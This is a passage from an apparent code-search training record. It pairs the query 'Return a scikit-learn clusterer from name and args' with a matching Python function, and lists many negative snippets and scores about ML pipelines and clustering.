dijkstra_opt()\n + dijkstra_flow()\n + sds_counterfactual_pl()\n + supply_interdiction_pl()\n + post_supply_interdiction_pl()\n )\n \n if tag:\n if type(tag)==str:\n return Pipeline([n for n in data_science_pipeline.nodes if tag in n.tags])\n elif type(tag)==list:\n return Pipeline([n for n in data_science_pipeline.nodes if len(n.tags - set(tag)) < len(n.tags)])\n \n else:\n return data_science_pipeline", "def pipelines(self):\r\n return pipelines.Pipelines(self)", "def build_model(self):\n pipeline = Pipeline([\n ('vec', CountVectorizer(tokenizer=self.tokenize)),\n ('tfidf', TfidfTransformer()),\n ('clf', MultiOutputClassifier(RandomForestClassifier()))\n ])\n self.model = pipeline\n return pipeline", "def get_cb_pipeline(train):\n from src.features import alchemy_feat, counting_feat, nltk_feat\n features = [\n ('sentiment', alchemy_feat.Sentiment()),\n ('sent_len', counting_feat.SentenceLength()),\n ('tfidf', counting_feat.BagOfTfIDF(train)),\n ('ner', alchemy_feat.NER()),\n ('pos', nltk_feat.POS())\n ]\n return get_pipeline(features)", "def build_logistic_regr():\n logistic_pipeline = None\n ##### Write code here #######\n logistic_pipeline = Pipeline([\n ('vect', CountVectorizer()),\n ('clf', LogisticRegression())\n ])\n ##### End of your work ######\n return logistic_pipeline", "def make_pipeline():\r\n base_universe = Q1500US()\r\n sector = Sector() \r\n # screen is based off of returns\r\n returns = Returns(window_length = 2)\r\n # check if stock price has good strength, but not necessarily overbought\r\n rsi = RSI() \r\n price = USEquityPricing.close.latest\r\n # creating filter by specifying the type of returns 
desired\r\n top_return_stocks = returns.top(1,mask=base_universe, groupby=sector)\r\n pipe = Pipeline(\r\n columns = {\r\n 'rsi': rsi,\r\n 'price': price\r\n },\r\n # filter top return stocks, and stocks that are not being overbought\r\n # but are not too oversold either\r\n screen = base_universe & top_return_stocks & (20 < rsi < 80)\r\n # the above is equivalent to: choose stocks from the base universe that have had the top returns in their sectors and have a good RSI value\r\n )\r\n return pipe", "def spacy_pipeline() -> spacy.language.Language:\n context = get_spacy_pipeline()\n assert context is not None\n return context", "def test_fit(self, pipeline):\n pipeline.fit(X, Y)", "def run(cls, pipeline, monitor=True, verbose=False):\n\n pipe = cls(pipeline, monitor=monitor, verbose=verbose)\n pipe._main()", "def build(X, y=None):\n model = Pipeline([\n ('preprocessor',NLTKPreprocessor()),\n ('vectorizer', CountVectorizer()),\n ('tfidf', TfidfTransformer()),\n ('clf', OneVsRestClassifier(LinearSVC(C=0.9)))])\n\n model.fit(X, y)\n return model", "def make_pipeline():\n \n # Base universe set to the QTradableStocksUS\n base_universe = QTradableStocksUS()#Q500US()\n base_universe = (base_universe & Q500US())\n base_universe = (base_universe & Fundamentals.market_cap.latest.top(150))\n \n # Factor of yesterday's close price.\n #yesterday_close = USEquityPricing.close.latest\n \n pipe = Pipeline(\n columns={\n #'close': yesterday_close,\n 'sector': Sector(),\n },\n screen=base_universe\n )\n return pipe", "def make_pipeline():\r\n\r\n # Custom universe containing only desired assets (stocks with flag data)\r\n universe = StaticSids(my_stocks)\r\n\r\n return Pipeline(\r\n columns={\r\n #'flag_type': algo_data_full.flag_type.latest,\r\n #'flag_price': algo_data_full.flag_price.latest,\r\n #'end_flag_date': algo_data_full.end_flag_date.latest,\r\n #'end_flag_price': algo_data_full.end_flag_price.latest,\r\n 'up_flags': flag_counts.up.latest,\r\n 'down_flags': flag_counts.down.latest,\r\n 'up_ratio': up_ratios_2.up_ratio.latest,\r\n 'close': USEquityPricing.close.latest,\r\n },\r\n screen=universe\r\n )", "def build_model():\n \n pipeline = Pipeline([\n ('vect', CountVectorizer(tokenizer=tokenize, max_df = 0.75, max_features = 5000, ngram_range = (1, 2))),\n ('tfidf', TfidfTransformer(use_idf = True)),\n ('clf', MultiOutputClassifier(estimator=RandomForestClassifier(n_estimators = 200, min_samples_split = 2)))\n ])\n \n return pipeline", "def pipeline(ctx):\n asyncio.run(pipeline_impl(ctx.obj[\"config\"]))", "def make_process_pipelines(\n self, dataset, return_epochs=False, return_raws=False, postprocess_pipeline=None\n ):\n if return_epochs and return_raws:\n message = \"Select only return_epochs or return_raws, not both\"\n raise ValueError(message)\n\n self.prepare_process(dataset)\n\n raw_pipelines = self._get_raw_pipelines()\n epochs_pipeline = self._get_epochs_pipeline(return_epochs, return_raws, dataset)\n array_pipeline = self._get_array_pipeline(\n return_epochs, return_raws, dataset, postprocess_pipeline\n )\n\n if array_pipeline is not None:\n events_pipeline = (\n self._get_events_pipeline(dataset) if return_raws else EpochsToEvents()\n )\n else:\n events_pipeline = None\n\n if events_pipeline is None and array_pipeline is not None:\n log.warning(\n f\"event_id not specified, using all the dataset's \"\n f\"events to generate labels: {dataset.event_id}\"\n )\n events_pipeline = (\n RawToEvents(dataset.event_id)\n if epochs_pipeline is None\n else EpochsToEvents()\n )\n\n 
process_pipelines = []\n for raw_pipeline in raw_pipelines:\n steps = []\n steps.append((StepType.RAW, SetRawAnnotations(dataset.event_id)))\n if raw_pipeline is not None:\n steps.append((StepType.RAW, raw_pipeline))\n if epochs_pipeline is not None:\n steps.append((StepType.EPOCHS, epochs_pipeline))\n if array_pipeline is not None:\n array_events_pipeline = ForkPipelines(\n [\n (\"X\", array_pipeline),\n (\"events\", events_pipeline),\n ]\n )\n steps.append((StepType.ARRAY, array_events_pipeline))\n process_pipelines.append(Pipeline(steps))\n return process_pipelines", "def setup_pipeline(self, estimator=None, biclass=True):\n if biclass:\n self.pipeline = Pipeline(estimator)\n else:\n self.pipeline = OneVsOneClassifier(Pipeline(estimator))", "def run(self):\n self.pipeline = self.set_pipeline()\n self.pipeline.fit(self.X,self.y)\n return self", "def _get_pipeline(self, conf: Optional[float] = None, fuse_model: bool = True) -> PoseEstimationPipeline:\n if None in (self._edge_links, self._image_processor, self._default_nms_conf):\n raise RuntimeError(\n \"You must set the dataset processing parameters before calling predict.\\n\" \"Please call `model.set_dataset_processing_params(...)` first.\"\n )\n\n conf = conf or self._default_nms_conf\n\n if len(self._keypoint_colors) != self.num_joints:\n raise RuntimeError(\n \"The number of colors for the keypoints ({}) does not match the number of joints ({})\".format(len(self._keypoint_colors), self.num_joints)\n )\n if len(self._edge_colors) != len(self._edge_links):\n raise RuntimeError(\n \"The number of colors for the joints ({}) does not match the number of joint links ({})\".format(len(self._edge_colors), len(self._edge_links))\n )\n\n pipeline = PoseEstimationPipeline(\n model=self,\n image_processor=self._image_processor,\n edge_links=self._edge_links,\n edge_colors=self._edge_colors,\n keypoint_colors=self._keypoint_colors,\n post_prediction_callback=self.get_post_prediction_callback(conf=conf),\n fuse_model=fuse_model,\n )\n return pipeline", "def make_pipeline(context):\n \n # Base universe of top 500 US stocks.\n base_universe_filter = Q500US()\n\n # Stocks of only tech sector.\n tech_sector = Sector(mask=base_universe_filter)\n tech_universe_filter = base_universe_filter & tech_sector.eq(311)\n\n # Top 10 tech stocks with largest market cap.\n mkt_cap_filter = morningstar.valuation.market_cap.latest\n top_mkt_cap_tech_filter = mkt_cap_filter.top(context.NUM_SYMBOLS, mask=tech_universe_filter)\n\n # Bollinger band factor with Stdev factor 2.\n lower_band_factor, middle_factor, upper_band_factor = BollingerBands(window_length=22, k=2, mask=top_mkt_cap_tech_filter)\n\n # Percent difference between (price, lower_band) and (price, upper_band).\n price = USEquityPricing.close.latest\n buy_percent_factor = ((lower_band_factor - price)*100)/price\n sell_percent_factor = ((price - upper_band_factor)*100)/price\n\n # Mean reversion buy and sell filters.\n # Sell when price exceeds upper-band and buy when price is below lower-band.\n buy_filter = buy_percent_factor > 0\n sell_filter = sell_percent_factor > 0\n\n # Build and return the Pipeline.\n pipe_bbands = Pipeline(columns={'buy_percent': buy_percent_factor,\n 'lower_band': lower_band_factor,\n 'buy': buy_filter,\n 'price': price,\n 'sell': sell_filter,\n 'upper_band': upper_band_factor,\n 'sell_percent': sell_percent_factor}, screen=top_mkt_cap_tech_filter)\n \n return pipe_bbands", "def pipeline(\n self,\n name: str,\n description: Optional[str] = None,\n labels: 
Optional[Sequence[PipelineLabel]] = None,\n ) -> \"Container\":\n _args = [\n Arg(\"name\", name),\n Arg(\"description\", description, None),\n Arg(\"labels\", labels, None),\n ]\n _ctx = self._select(\"pipeline\", _args)\n return Container(_ctx)", "def main(**kwargs):\n\n wrap_predict(kwargs['input'],\n kwargs['output'],\n kwargs['pipeline'])", "def test_pipe_simple():\n\n def transform(array):\n \"\"\"Turns the (n,2) array into a (n,4) array.\"\"\"\n assert array.shape == (10, 2)\n new = Array(columns=\"abcd\")\n for x, y in array:\n new.append([x, y, x + y, x * y])\n return new\n\n group = Pipe(Group({\"a\": Numerical(), \"b\": Numerical()}), transform)\n for _ in range(10):\n group.set_a(1e-6 + random())\n group.set_b(1e-6 + random())\n group.push()\n\n array = group.array()\n assert array.shape == (10, 4)\n\n for row in array:\n assert row[0] > 0.0 and row[1] > 0.0\n assert row[2] == row[0] + row[1]\n assert row[3] == row[0] * row[1]", "def fill_pipeline():\n\n # m1_pca = PCA()\n m1_pca = PCA(svd_solver='randomized', whiten=True) # 与官网里子一致的后2个参数,否则分数很差\n # m1_pca.fit(X_train)\n\n m2_svc = SVC(kernel='rbf', class_weight='balanced')\n\n pipe = Pipeline(steps=[('pca', m1_pca),\n ('svc', m2_svc)])\n print('\\n===================原 estimator')\n pprint(pipe.named_steps)\n return pipe", "def get_estimator(arguments):\n \n numerical_indices = [1, 2, 4, 5,6,7,8,9,10,11,12,13,14]\n categorical_indices = [0]\n original_indices = list(set(range(59))-set(numerical_indices)-set(categorical_indices))\n \n p1 = make_pipeline(my_module.PositionalSelector(categorical_indices),OneHotEncoder())\n p2 = make_pipeline(my_module.PositionalSelector(numerical_indices),StandardScaler())\n p3 = make_pipeline(my_module.PositionalSelector(original_indices))\n \n feats = FeatureUnion([('categoricals', p1),\n ('numericals', p2),\n ('originals', p3),])\n \n # tolerance and C are expected to be passed as\n # command line argument to task.py\n pipeline = Pipeline([('pre', feats),\n ('estimator', linear_model.LogisticRegression(penalty=\"l2\",\n tol=arguments.tol,\n C = arguments.C,\n solver='lbfgs',\n max_iter=10000))])\n \n # tolerance and C are expected to be passed as\n # command line argument to task.py\n #classifier = linear_model.LogisticRegression(\n # penalty=\"l2\",\n # tol=arguments.tol,\n # C = arguments.C,\n # solver='lbfgs',\n # max_iter=1000\n #)\n \n return pipeline", "def createMarkov(linkograph, linkNum=1, method='link_predictor',\n precision=2):\n\n if method.lower() == 'link_predictor':\n return createLinkPredictorMarkov(linkograph, linkNum=linkNum,\n precision=precision)\n elif method.lower() == 'behavioral':\n return createBehavioralMarkov(linkograph, linkNum=linkNum,\n precision=precision)\n else:\n raise ValueError('Unrecognized method.')", "def pipe(self, func: Callable[..., Any], *args: Any, **kwargs: Any) -> Any:\n\n if isinstance(func, tuple):\n func, target = func\n if target in kwargs:\n raise ValueError(\"%s is both the pipe target and a keyword \" \"argument\" % target)\n kwargs[target] = self\n return func(*args, **kwargs)\n else:\n return func(self, *args, **kwargs)", "def cli_markov():\n\n info = 'Creates a transition matrix from a linkograph.'\n\n parser = argparse.ArgumentParser(description=info)\n\n parser.add_argument('linkograph', metavar='LINKOGRAPH.json',\n nargs=1,\n help='The linkograph')\n\n parser.add_argument('-o', '--out', metavar='OUTPUT_FILE',\n help='Prints the result to a file.')\n\n parser.add_argument('-m', '--method',\n help='The method used to create the 
model.')\n\n parser.add_argument('-f', '--forelinks', action='store_true',\n help='Use forelinks')\n\n parser.add_argument('-b', '--backlinks', action='store_true',\n help='Use backlinks')\n\n parser.add_argument('-d', '--dot', action='store_true',\n help='Create dot file.')\n\n parser.add_argument('-l', '--latex', action='store_true',\n help='Create latex file.')\n\n parser.add_argument('-t', '--transition', action='store_true',\n help='Use transition matrix')\n\n parser.add_argument('-p', '--precision', type=int,\n help='Number of digits retained.')\n\n args = parser.parse_args()\n\n linkNum = 1 # For forelinks.\n\n if args.backlinks:\n linkNum = 0 # For backlinks.\n\n if args.precision is None:\n args.precision = 2\n\n if args.method is None:\n args.method = 'link_predictor'\n\n linko = linkoCreate.readLinkoJson(args.linkograph[0])\n\n markovChain = createMarkov(linko, linkNum=linkNum,\n method = args.method,\n precision=args.precision)\n\n if args.out is not None:\n fh = open(args.out, 'w')\n else:\n fh = sys.stdout\n\n if args.transition:\n fh.write(str(linko.labels))\n fh.write('\\n')\n fh.write(str(markovChain))\n fh.write('\\n')\n elif args.latex:\n latexString = markovToLatex(markovChain, linko.labels,\n args.precision)\n fh.write(latexString)\n else:\n # markovToDot(markovChain, linko.labels, fh,\n # args.precision)\n\n dotString = markovToDot(markovChain, linko.labels,\n args.precision)\n fh.write(dotString)\n\n fh.close()", "def test_export_pipeline():\n tpot_obj = TPOTClassifier()\n pipeline = creator.Individual.\\\n from_string(\"KNeighborsClassifier(CombineDFs(GradientBoostingClassifier(input_matrix, 38.0, 0.87), SelectKBest(input_matrix, 5)), 18, 33)\", tpot_obj._pset)\n\n expected_code = \"\"\"import numpy as np\n\nfrom sklearn.ensemble import GradientBoostingClassifier, VotingClassifier\nfrom sklearn.feature_selection import SelectKBest, f_classif\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.neighbors import KNeighborsClassifier\nfrom sklearn.pipeline import make_pipeline, make_union\nfrom sklearn.preprocessing import FunctionTransformer\n\n# NOTE: Make sure that the class is labeled 'class' in the data file\ntpot_data = np.recfromcsv('PATH/TO/DATA/FILE', delimiter='COLUMN_SEPARATOR', dtype=np.float64)\nfeatures = np.delete(tpot_data.view(np.float64).reshape(tpot_data.size, -1), tpot_data.dtype.names.index('class'), axis=1)\ntraining_features, testing_features, training_classes, testing_classes = \\\\\n train_test_split(features, tpot_data['class'], random_state=42)\n\nexported_pipeline = make_pipeline(\n make_union(\n make_union(VotingClassifier([('branch',\n GradientBoostingClassifier(learning_rate=1.0, max_features=1.0, n_estimators=500)\n )]), FunctionTransformer(lambda X: X)),\n SelectKBest(k=5, score_func=f_classif)\n ),\n KNeighborsClassifier(n_neighbors=5, weights=\"distance\")\n)\n\nexported_pipeline.fit(training_features, training_classes)\nresults = exported_pipeline.predict(testing_features)\n\"\"\"\n\n assert expected_code == export_pipeline(pipeline)", "def mockpipe_fmt(request, testdir):\n mp = testdir.makefile(\"\", pipeline=MOCK_PIPELINE_FMT)\n return mp", "def make_pipeline(slam, settings):\n\n pipeline_name = \"pipeline_source[inversion]\"\n\n \"\"\"\n This pipeline is tagged according to whether:\n\n 1) Hyper-fitting settings (galaxies, sky, background noise) are used.\n 2) The lens galaxy mass model includes an `ExternalShear`.\n 3) The `Pixelization` and `Regularization` scheme of the pipeline (fitted in phases 3 & 4).\n 
\"\"\"\n\n path_prefix = f\"{slam.path_prefix}/{pipeline_name}/{slam.source_inversion_tag}\"\n\n \"\"\"\n Phase 1: Fit the `Pixelization` and `Regularization`, where we:\n\n 1) Fix the lens mass model to the `MassProfile`'s inferred by the previous pipeline.\n \"\"\"\n\n phase1 = al.PhaseImaging(\n search=af.DynestyStatic(\n name=\"phase[1]_mass[fixed]_source[inversion_magnification_initialization]\",\n n_live_points=30,\n ),\n galaxies=dict(\n lens=al.GalaxyModel(\n redshift=slam.redshift_lens,\n mass=af.last.instance.galaxies.lens.mass,\n shear=af.last.instance.galaxies.lens.shear,\n hyper_galaxy=af.last.hyper_combined.instance.optional.galaxies.lens.hyper_galaxy,\n ),\n source=al.GalaxyModel(\n redshift=slam.redshift_source,\n pixelization=al.pix.VoronoiMagnification,\n regularization=al.reg.Constant,\n hyper_galaxy=af.last.hyper_combined.instance.optional.galaxies.source.hyper_galaxy,\n ),\n ),\n hyper_image_sky=af.last.hyper_combined.instance.optional.hyper_image_sky,\n hyper_background_noise=af.last.hyper_combined.instance.optional.hyper_background_noise,\n settings=settings,\n )\n\n phase1 = phase1.extend_with_multiple_hyper_phases(\n setup_hyper=slam.setup_hyper, include_inversion=False\n )\n\n \"\"\"\n Phase 2: Fit the lens`s mass and source galaxy using the magnification `Inversion`, where we:\n\n 1) Fix the source `Inversion` parameters to the results of phase 1.\n 2) Set priors on the lens galaxy `MassProfile`'s using the results of the previous pipeline.\n \"\"\"\n\n phase2 = al.PhaseImaging(\n search=af.DynestyStatic(\n name=\"phase[2]_mass[total]_source[fixed]\", n_live_points=50\n ),\n galaxies=dict(\n lens=al.GalaxyModel(\n redshift=slam.redshift_lens,\n mass=af.last[-1].model.galaxies.lens.mass,\n shear=af.last[-1].model.galaxies.lens.shear,\n ),\n source=al.GalaxyModel(\n redshift=slam.redshift_source,\n pixelization=phase1.result.instance.galaxies.source.pixelization,\n regularization=phase1.result.instance.galaxies.source.regularization,\n hyper_galaxy=phase1.result.hyper_combined.instance.optional.galaxies.source.hyper_galaxy,\n ),\n ),\n hyper_image_sky=phase1.result.hyper_combined.instance.optional.hyper_image_sky,\n hyper_background_noise=phase1.result.hyper_combined.instance.optional.hyper_background_noise,\n settings=settings,\n )\n\n phase2 = phase2.extend_with_multiple_hyper_phases(\n setup_hyper=slam.setup_hyper, include_inversion=False\n )\n\n \"\"\"\n Phase 3: fit the input pipeline `Pixelization` & `Regularization`, where we:\n\n 1) Fix the lens `MassProfile` to the result of phase 2.\n \"\"\"\n\n phase3 = al.PhaseImaging(\n search=af.DynestyStatic(\n name=\"phase[3]_mass[fixed]_source[inversion_initialization]\",\n n_live_points=30,\n evidence_tolerance=slam.setup_hyper.evidence_tolerance,\n sample=\"rstagger\",\n ),\n galaxies=dict(\n lens=al.GalaxyModel(\n redshift=slam.redshift_lens,\n mass=phase2.result.instance.galaxies.lens.mass,\n shear=phase2.result.instance.galaxies.lens.shear,\n ),\n source=al.GalaxyModel(\n redshift=slam.redshift_source,\n pixelization=slam.pipeline_source_inversion.setup_source.pixelization_prior_model,\n regularization=slam.pipeline_source_inversion.setup_source.regularization_prior_model,\n hyper_galaxy=phase2.result.hyper_combined.instance.optional.galaxies.source.hyper_galaxy,\n ),\n ),\n hyper_image_sky=phase2.result.hyper_combined.instance.optional.hyper_image_sky,\n hyper_background_noise=phase2.result.hyper_combined.instance.optional.hyper_background_noise,\n settings=settings,\n )\n\n phase3 = 
phase3.extend_with_multiple_hyper_phases(\n setup_hyper=slam.setup_hyper, include_inversion=False\n )\n\n \"\"\"\n Phase 4: fit the lens`s mass using the input pipeline `Pixelization` & `Regularization`, where we:\n\n 1) Fix the source `Inversion` parameters to the results of phase 3.\n 2) Set priors on the lens galaxy `MassProfile`'s using the results of phase 2.\n \"\"\"\n\n mass = slam.pipeline_source_parametric.setup_mass.mass_prior_model_with_updated_priors(\n index=-1, unfix_mass_centre=True\n )\n\n phase4 = al.PhaseImaging(\n search=af.DynestyStatic(\n name=\"phase[4]_mass[total]_source[fixed]\", n_live_points=50\n ),\n galaxies=dict(\n lens=al.GalaxyModel(\n redshift=slam.redshift_lens,\n mass=mass,\n shear=phase2.result.model.galaxies.lens.shear,\n ),\n source=al.GalaxyModel(\n redshift=slam.redshift_source,\n pixelization=phase3.result.instance.galaxies.source.pixelization,\n regularization=phase3.result.instance.galaxies.source.regularization,\n hyper_galaxy=phase3.result.hyper_combined.instance.optional.galaxies.source.hyper_galaxy,\n ),\n ),\n hyper_image_sky=phase3.result.hyper_combined.instance.optional.hyper_image_sky,\n hyper_background_noise=phase3.result.hyper_combined.instance.optional.hyper_background_noise,\n settings=settings,\n )\n\n phase4 = phase4.extend_with_multiple_hyper_phases(\n setup_hyper=slam.setup_hyper, include_inversion=True\n )\n\n return al.PipelineDataset(\n pipeline_name, path_prefix, phase1, phase2, phase3, phase4\n )", "def pipeline(self):\n\n transformers = []\n\n custom = self.CustomFeature()\n #transformers.append(('custom', custom))\n n_features = int(self.n_features/2)\n\n #kbest = SelectKBest(score_func=chi2, k=n_features)\n #transformers.append(('kbest', kbest))\n\n # pca = PCA(n_components=n_features, svd_solver='randomized', whiten=True)\n # transformers.append(('pca', pca))\n\n if self.definer.problem_type == 'classification':\n extraTC = SelectFromModel(ExtraTreesClassifier(criterion='entropy'))\n else:\n extraTC = SelectFromModel(ExtraTreesRegressor())\n\n transformers.append(('extraTC', extraTC))\n\n #scaler = StandardScaler()\n #transformers.append(('scaler', scaler))\n #binarizer = Binarizer()\n return FeatureUnion(transformers)", "def run(self, pipeline: pipeline_pb2.Pipeline) -> Optional[Any]:\n pass", "def pipeline(\n self,\n name: str,\n description: Optional[str] = None,\n labels: Optional[Sequence[PipelineLabel]] = None,\n ) -> \"Directory\":\n _args = [\n Arg(\"name\", name),\n Arg(\"description\", description, None),\n Arg(\"labels\", labels, None),\n ]\n _ctx = self._select(\"pipeline\", _args)\n return Directory(_ctx)", "def read(cls):\n return PipelineJavaMLReader(cls, \"com.ibm.analytics.wml.pipeline.spark.MLPipeline\")", "def from_pipeline(cls, pipeline, proba=None, repeat=None):\n if proba is None:\n if repeat is None:\n new_p = cls(pipeline=pipeline)\n else:\n if pipeline.num_actions == 1 and pipeline.get_last_action_proba() is None:\n new_p = cls(pipeline=pipeline, repeat=repeat)\n else:\n new_p = cls()\n new_p.append_pipeline(pipeline, repeat=repeat)\n else:\n if pipeline.num_actions == 1 and pipeline.get_last_action_repeat() is None:\n new_p = cls(pipeline=pipeline, proba=proba)\n else:\n new_p = cls()\n new_p.append_pipeline(pipeline, proba=proba)\n return new_p", "def __init__(self, pipeline, config=None):\n self.config = config\n self.pipeline = pipeline", "def test_pipeline_basic(mockpipe, testdir):\n test = testdir.makepyfile(TEST_OK)\n result = testdir.inline_run(\n \"-v\",\n 
f\"--base-pipeline-dir={test.dirname}\",\n test\n )\n passed, skipped, failed = result.listoutcomes()\n\n assert len(passed) == 1\n assert len(skipped) == 0\n assert len(failed) == 0", "def build_model():\n # Build ML pipeline using random forest classifier\n model = Pipeline([\n ('vect', CountVectorizer(tokenizer = tokenize)),\n ('tfidf', TfidfTransformer()),\n ('clf', MultiOutputClassifier(RandomForestClassifier(\n n_estimators=100, min_samples_split=2)))\n ])\n\n return model", "def build_model():\n # Build ML pipeline using random forest classifier\n model = Pipeline([\n ('vect', CountVectorizer(tokenizer = tokenize)),\n ('tfidf', TfidfTransformer()),\n ('clf', MultiOutputClassifier(RandomForestClassifier(\n n_estimators=100, min_samples_split=2)))\n ])\n\n return model", "def __rmul__(self, other):\n from sktime.clustering.compose import ClustererPipeline\n from sktime.transformations.base import BaseTransformer\n from sktime.transformations.compose import TransformerPipeline\n from sktime.transformations.series.adapt import TabularToSeriesAdaptor\n\n # behaviour is implemented only if other inherits from BaseTransformer\n # in that case, distinctions arise from whether self or other is a pipeline\n # todo: this can probably be simplified further with \"zero length\" pipelines\n if isinstance(other, BaseTransformer):\n # ClustererPipeline already has the dunder method defined\n if isinstance(self, ClustererPipeline):\n return other * self\n # if other is a TransformerPipeline but self is not, first unwrap it\n elif isinstance(other, TransformerPipeline):\n return ClustererPipeline(clusterer=self, transformers=other.steps)\n # if neither self nor other are a pipeline, construct a ClustererPipeline\n else:\n return ClustererPipeline(clusterer=self, transformers=[other])\n elif is_sklearn_transformer(other):\n return TabularToSeriesAdaptor(other) * self\n else:\n return NotImplemented", "def forward_transform(self):\n\n if self._pipeline:\n #return functools.reduce(lambda x, y: x | y, [step[1] for step in self._pipeline[: -1]])\n return functools.reduce(lambda x, y: x | y, [step.transform for step in self._pipeline[:-1]])\n else:\n return None", "def main():\n parser = argparse.ArgumentParser()\n parser.add_argument(\"-data_dir\", required=True, help=\"Directory containing original data set in requisite folder structure (small part or all data)\")\n parser.add_argument(\"-features_filename\", required=True, help=\"Features cloudpickle file that provides that pruning information\")\n parser.add_argument(\"-start_seed\", type=int, default=1284171779)\n parser.add_argument(\"-num_datasets\", type=int, default=20)\n parser.add_argument(\"-modes\", choices=[PREPROCESS, TRAIN, EVALUATE], nargs=\"+\", required=True)\n args = parser.parse_args()\n return pipeline(args)", "def m_pipe(val, *fns, **kwargs):\n kw = kwargs\n _val = val\n for fn in fns:\n _val = fn(_val, **kw)\n return _val", "def build_pipeline_steps(do_bigram_sent, do_unigram_sent, bigram_sent_file, unigram_sent_file):\n features = []\n #print(\"Adding ngram features : ngram_range 2\")\n text_pipeline = ('text_pipeline', Pipeline([('ngrams', CountVectorizer(\n stop_words=\"english\", ngram_range=(1, 2), preprocessor=str.split, tokenizer=lambda x:x))]))\n features.append(text_pipeline)\n if do_bigram_sent:\n #print(\"Add bigram sentiment scores\")\n bigram_sent_score_lookup = get_bigram_sentiments(bigram_sent_file)\n features.append((\"bigram sentiment score\", FunctionTransformer(\n score_document_bigrams, kw_args={'score_lookup': 
bigram_sent_score_lookup}, validate=False)))\n if do_unigram_sent:\n #print(\"Add unigram sentiment scores\")\n unigram_sent_score_lookup = get_unigram_sentiments(unigram_sent_file)\n features.append((\"unigram sentiment score\", FunctionTransformer(\n score_document, kw_args={'score_lookup': unigram_sent_score_lookup}, validate=False)))\n pipeline_steps = Pipeline([(\"features\", FeatureUnion(features))])\n return pipeline_steps", "def fit_predict_model(self, X_train, y_train, X_test, pipeline):\n\n pipeline.fit(X_train, y_train)\n y_pred = pipeline.predict(X_test)\n return y_pred", "def __call__(self, seq, mask=(True, False)):\n for transformer in self.transformers:\n seq = transformer(seq, mask)\n return seq" ]
[ "0.6571192", "0.6444065", "0.6408322", "0.60807306", "0.6047931", "0.5914984", "0.59031147", "0.58204484", "0.5804149", "0.5747107", "0.5725643", "0.5704614", "0.5703797", "0.56960964", "0.56624687", "0.56623226", "0.5654284", "0.562496", "0.5591383", "0.55484897", "0.5527152", "0.55214953", "0.5515504", "0.5454731", "0.5431739", "0.5416454", "0.5387037", "0.536923", "0.5362079", "0.5361307", "0.5358632", "0.5343977", "0.53311324", "0.5329383", "0.53095514", "0.5271863", "0.5270154", "0.5263647", "0.5252655", "0.5249022", "0.5224243", "0.5187806", "0.51836973", "0.5178973", "0.51744735", "0.51505464", "0.5144407", "0.51161736", "0.51148087", "0.5101865", "0.51011825", "0.5095515", "0.5095515", "0.5094477", "0.50904405", "0.5064834", "0.5062134", "0.5052815", "0.5047644", "0.5043843", "0.50388217", "0.5033778", "0.5031922", "0.5029716", "0.5024996", "0.50227326", "0.5012179", "0.5010708", "0.5001752", "0.49897128", "0.4987921", "0.49834302", "0.49708194", "0.4965992", "0.49579322", "0.49548346", "0.4951075", "0.49351716", "0.49124846", "0.49018064", "0.48930818", "0.4891037", "0.48898372", "0.48841867", "0.48637784", "0.48590323", "0.48188254", "0.48171616", "0.48041812", "0.47997808", "0.4789441", "0.47881207", "0.47881207", "0.4768369", "0.476378", "0.4757564", "0.4748435", "0.47393388", "0.47387958", "0.47334924" ]
0.83327645
0
Return a scikit-learn clusterer from name and args.
def get_clusterer(name, kwargs):
    if name == 'KMeans':
        from sklearn.cluster import KMeans
        return KMeans(**kwargs)
    if name == 'MiniBatchKMeans':
        from sklearn.cluster import MiniBatchKMeans
        return MiniBatchKMeans(**kwargs)
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def show_cluster(name: str) -> Cluster:\n environment = EnvironmentProvider().environment\n return environment.clusters[name]", "def create_marker_cluster(name: str):\n return MarkerCluster(name=name)", "def launch_example_cluster_cmd(*args, **kwargs):\n return launch_example_cluster(*args, **kwargs)", "def cluster(args):\n\n # if not (args.coverage or args.index):\n # logging.error('Must specify a coverage file or contigs + reference index.')\n\n logging.info('Starting clustering process')\n perform_clustering(args)", "def parse_clustering(key, content):\n if inspect.isclass(key):\n cl = key(**content)\n key = cl.__class__.__name__.lower()\n\n elif 'auto' in (content.get('n_clusters', ''),\n content.get('preference', '')) \\\n and key.lower() != 'hierarchical':\n # Wrapper class that automatically detects the best number of clusters\n # via 10-Fold CV\n content.pop('n_clusters', '')\n content.pop('preference', '')\n\n kwargs = {'param_grid': [], 'n_jobs': -1,\n 'scoring': silhouette_score, 'cv': 10}\n\n if key.lower() == 'kmeans':\n content.setdefault('init', 'k-means++')\n content.setdefault('n_jobs', 1)\n kwargs['estimator'] = KMeans(**content)\n elif key.lower() == 'ap':\n kwargs['estimator'] = AffinityPropagation(**content)\n kwargs['affinity'] = kwargs['estimator'].affinity\n else:\n logging.error(\"n_clusters = 'auto' specified outside kmeans or \"\n \"ap. Trying to create GridSearchCV pipeline anyway \"\n \" ...\")\n cl = GridSearchCV(**kwargs)\n elif 'auto' in (content.get('n_clusters', ''),\n content.get('preference', '')) \\\n and key.lower() == 'hierarchical':\n # TODO implement this\n # from adenine.utils.extensions import AgglomerativeClustering\n cl = AgglomerativeClustering(**content)\n else:\n if key.lower() == 'kmeans':\n content.setdefault('n_jobs', -1)\n cl = KMeans(**content)\n elif key.lower() == 'ap':\n content.setdefault('preference', 1)\n cl = AffinityPropagation(**content)\n elif key.lower() == 'ms':\n cl = MeanShift(**content)\n elif key.lower() == 'spectral':\n cl = SpectralClustering(**content)\n elif key.lower() == 'hierarchical':\n cl = AgglomerativeClustering(**content)\n else:\n cl = DummyNone()\n return (key, cl, 'clustering')", "def get_one_cluster_by_name(ctx, cluster_name, project_name):\n project = ctx.obj.groups.byName[project_name].get().data\n cluster = ctx.obj.groups[project.id].clusters[cluster_name].get()\n pprint(cluster.data)", "def __init__(self, conn, args, data, split_type, num_clusters):\n\n self.conn = conn\n self.args = args\n self.data = data\n self.split_type = split_type\n\n self.pca_model = None\n self.cluster_model = None\n self.algorithm = args['cluster_algorithm']\n\n # http://scikit-learn.org/stable/auto_examples/cluster/plot_cluster_comparison.html\n hdbsc = hdbscan.HDBSCAN(min_cluster_size=10)\n affinity_propagation = cluster.AffinityPropagation()\n ms = cluster.MeanShift(bin_seeding=True)\n spectral = cluster.SpectralClustering(n_clusters=num_clusters, \n eigen_solver='arpack',\n affinity=\"nearest_neighbors\", \n random_state=self.args['seed'])\n ward = cluster.AgglomerativeClustering(n_clusters=num_clusters, \n linkage='ward')\n birch = 